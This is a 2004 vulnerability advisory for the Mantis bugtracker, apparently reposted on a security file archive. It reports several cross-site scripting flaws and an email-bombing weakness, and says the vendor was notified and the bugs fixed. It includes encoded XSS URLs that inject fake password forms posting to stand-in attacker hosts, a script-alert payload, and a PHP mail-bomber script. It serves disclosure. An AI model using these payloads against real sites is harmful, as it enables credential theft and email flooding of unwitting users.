what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

mantis.txt

mantis.txt
Posted Aug 24, 2004
Authored by Joxean Koret

Mantis is susceptible to multiple cross site scripting vulnerabilities.

tags | advisory, vulnerability, xss
SHA-256 | a6f58dd97966c39ee1d173207fb0d4d25219702ee1bad263cc675e5318ce6bef

mantis.txt

Change Mirror Download


---------------------------------------------------------------------------
Multiple vulnerabilities in Mantis
Bugtracker
---------------------------------------------------------------------------

Author: Joxean Koret
Date: This year, 2004 :) between June and
August
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mantis Bugtracker

Mantis is a web-based bugtracking system. It is
written in the PHP scripting
language and requires the MySQL database and
a webserver.

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Multiple Cross Site Scripting Vulnerabilities :

A1. The first vulnerability that I found is this : You
can login in anonymously and,
when do you want to perform a privileged action
you need to re-login with any valid
user. The previous URL is passed as the return
parameter to the login_page.php script.
This parameter is not correctly sanitized when
showing/parsing and we can put any
html/script code that we want. To try the first
vulnerability copy the following text
and paste in the location bar of your favourite
web browser :

http://<site-with-mantis-bugtracker>/login_page.php?return=%
22%3E%3Ch1%3EHello!%3C/h1%3E%
3Cform%20action=%
22http://malicious.site.com/script.xxx%22%
3EPlease%20type%20your%20password%20:
%20%3Cinput%20type=%22password%22%
20name=%22your_password%22%3E%3Cbr%
3E%3Cinput%20type=%22submit%22%
20value=%22Give%20me%20your%
20password,%20please...%22%3E%3C/form%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%
3E%3Cbr

A2. Register New User Xss Vulnerability

-The second XSS problem is in the script
signup.php (for example,
http://bugs.mantisbt.org/signup.php). [^] This
scripts registers
a new user. The problem is that the script's
doesn't sanitize properly the passed e-mail
when showing/parsing. Now, we have
the second XSS problem that I found. To test it,
please follow these steps :

- Navigate to
http://<site-with-mantis-bugtracker>/signup_page.php
[^]
- In the username field type any username
that you want
- In the e-mail field type this text : <iframe
src=http://www.playboy.com></iframe> or
<h1>Hi!</h1>

A3. Select Project XSS Vulnerability
------------------------------------

-I will no explicate the problem because is the
same all times. Try the following URL please :

http://<site-with-mantis-bugtracker>/login_select_proj_page.php?ref=%
3Cbr%3E%3Cform%20action=%
22http://my.fucking.site/xxx.sss%22%3E%
3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%
3C/td%3E%3Ctd%3E%3Cinput%20type=text%
20name=user%3E%3C/tr%3E%3Ctr%3E%
3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%
3Cinput%20type=password%20name=pass%
3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%
20colspan=2%3E%3Cinput%20type=submit%
20%20value=%22login%22%20onclick=%
22javascript:alert('hi')%22%3E%3C/td%3E%
3C/tr%3E%3C/form%3E

A4. An other XSS Vulnerability

- Try the following URL :

http://<site-with-mantis-bugtracker>/view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')</script>

----------------------------------------------


B. Possible E-Mail Bomber.

- That's fun! We can create a simple program to
send too many e-mails to the same e-mail
address by simply changing the username.

For example :

1.-Navigate to
http://<site-with-mantis-bugtracker>/signup_page.php
2.- In the username field type test0
3.- In the e-mail type test@test.com
4.- Send it.

1.-Navigate to
http://<site-with-mantis-bugtracker>/signup_page.php
2.- In the username field type test1
3.- In the e-mail type test@test.com
4.- Send it.

If do you want to try the problem you can use the
following simple script :

======================================================================

mantis-email-bomber.php

<?php

//Please, change it becuase is my e-mail :)
$email = "anyemail@address";
$base_user = "test";
$i = 0;
$site = "http://<site-with-mantis-bugtracker";

for ($i=0;$i<=15;$i++)
{
echo("Sending e-mail number $i\n");
$user = "$base_user$i";
echo("New user is $user\n");
$url =
"http://$site/signup.php?username=$user&email=$email";
echo("URL is $url\n");
$fd = fopen($url,"r");
echo("E-mail $i sended\n");
fclose($fd);
}

?>

======================================================================

---------------------------------------------------------------------------

The fix:
~~~~~~~~

Vendor is contacted and all the bugs are
correcteds in the CVS version at
sourceforge.net site.

---------------------------------------------------------------------------
Contact:
~~~~~~~~

Joxean Koret at
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es



Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close